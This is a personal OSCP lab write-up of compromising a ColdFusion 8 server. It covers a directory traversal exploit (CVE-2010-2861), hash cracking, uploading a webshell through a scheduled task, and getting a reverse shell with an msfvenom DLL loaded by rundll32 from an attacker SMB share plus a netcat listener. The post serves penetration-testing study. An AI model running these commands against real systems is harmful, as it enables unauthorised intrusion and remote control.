As I continue my OSCP journey I have popped a few more boxes since my last blog. It’s been about a month or two so I figure I would write another one describing how I went from initially exploiting a directory traversal vulnerability to eventually getting shell access as system on a Windows box running ColdFusion version 8.
Of course, I started off by running a port scan and vulnerability scan using Nmap.
Nmap -sT -A –top-ports=20 x.x.x.x-254 oG top-port-sweep.txt
nmap -A -sV --script=default,vuln -p- --open -oA tcp_10.11.1.x 10.11.1.x
To be honest though what I really did was look at my results from the full nmap vulnerability scan I ran on all devices once I got access to the labs. I mention this because when you get access to a hacking lab it’s always a good idea to just run a full scan in the background as you plug away. Below I the command I ran.
nmap -A -sV --script=default,vuln -p- --open -oA all-hosts 10.11.1.0/24
This gave me a file that contained all the vulnerability information that existed on all devices in that subnet block.
From the port scan, I didn’t have much. As a matter of fact, all top 20 ports seemed to be filtered.
Ports: 21/filtered/tcp//ftp///, 22/filtered/tcp//ssh///, 23/filtered/tcp//telnet///, 25/filtered/tcp//smtp///, 53/filtered/tcp//domain///, 80/filtered/tcp//http///, 110/filtered/tcp//pop3///, 111/filtered/tcp//rpcbind///, 135/filtered/tcp//msrpc///, 139/filtered/tcp//netbios-ssn///, 143/filtered/tcp//imap///, 443/filtered/tcp//https///, 445/filtered/tcp//microsoft-ds///, 993/filtered/tcp//imaps///, 995/filtered/tcp//pop3s///, 1723/filtered/tcp//pptp///, 3306/filtered/tcp//mysql///, 3389/filtered/tcp//ms-wbt-server///, 5900/filtered/tcp//vnc///, 8080/filtered/tcp//http-proxy///
This was interesting but when I looked at the results from the vulnerability scan port 80 http was available running IIS 6 with ColdFusion V8. When I browsed to the IP address, there was no default webpage setup.
As you can see in the picture above there is a directory traversal vulnerability (cve-2010-2861) available on the device. In addition to the above information there was other data I was not sure what it was related to.
After doing some basic google searching I came across the following websites that helped put into perspective what I was able to do with the initial vulnerability as well as what else I could do for ultimately a command shell.
Apparently, the vulnerability gave you access to the contents of a password file which I later found out was the information that was in the initial Nmap scan. This hash was the password for the admin portal to ColdFusion. You could run the follow code on the browser to get the same information I had in the scan. The exact URL would vary based on the versions of ColdFusion.
There were also a few python scripts that were available to glean the same information. Once I had the password hash, I found an online password cracker https://crackstation.net/ and found out the password.
I used that password to get me into the admin page of ColdFusion which is usually found at this link.
Getting into an admin portal was cool but of course, I wanted more. How do I get to execute commands and what privilege was I? Based on past experience I needed to figure out a way to upload a file to hopefully get a shell or at least get me the ability to run other commands or escalate privileges if I needed to. Come to find out there is a way to upload files and run them through the admin portal. Under debugging and logging there is an ability to schedule a task.
So, I went to create a scheduled task. I first had to give it a task name which could be anything. Then in the URL section I added my website with the file I eventually wanted to upload and run. Of course, I needed to make sure I had my website running and I had to find a good malicious file to use to give me a webshell. Back to that in a bit. The other information I needed before I finished the task was in the file section. Needed to checkbox the “save to output file” and give it a location and file name. For the location I needed to find out the default mappings, so I went to the mappings section on the server settings in the portal. I was looking for the directory path for /CFIDE which in this case was C:\Inetpub\wwwroot\CFIDE. This is what needed to go into the file section along with the file name.
Now for the malicious file I found the below site that had a good .CFM file (ColdFusion file)
This would give me a webshell that would allow me to run commands. This was the file name (cfexec.cfm) I gave in my task settings. Once complete I needed to create the task and start it.
I moved to browser and typed http://site/CFIDE/cfexec.cfm which gave me a web shell. I ran the command whoami to see what access I had. I was lucky enough to already be system which was cool. Privileges already escalated.
The next step is to get a command shell. To do this I basically did what I had done before using rundll32.exe to call a file from my SMB share I created on my kali box using IMPACKET.
I ran rundll32.exe \\10.x.x.x\smb\shell.dll,0.
To create the shell file, I used msfvenom which would provide me a reverse shell on port 5555.
msfvenom -p windows/shell_reverse_tcp -f dll LHOST=10.x.x.x LPORT=5555 > ./shell.dll
With my kali box listening with Netcat on port 5555 I got myself a shell.
nc -vlp 5555
Meet Anthony Giandomenico: The man behind "Illumin808"
Experienced Information Security Executive, Evangelist, Entrepreneur, and Mentor with over 20 years of experience. In his current position, he is focused on delivering knowledge, tools, and methodologies to properly demonstrate advanced threat concept and defense strategy using a practical approach to security.
He has presented, trained and mentored various security concepts and strategies at many conferences, trade shows and media outlets including a weekly appearance on KHON2-TV morning news “Tech Buzz” segment and Technology News Bytes on OC16, providing monthly security advice.
Mr. Giandomenico founded and managed Secure DNA Inc. a global security consulting company focused on protecting critical infrastructures such as financial institutions, hospitals, and government agencies. As a consultant, Anthony provided expertise in many areas including security program development, defensive strategies, incident response, and forensics procedures, security assessments, penetration testing, and security operations.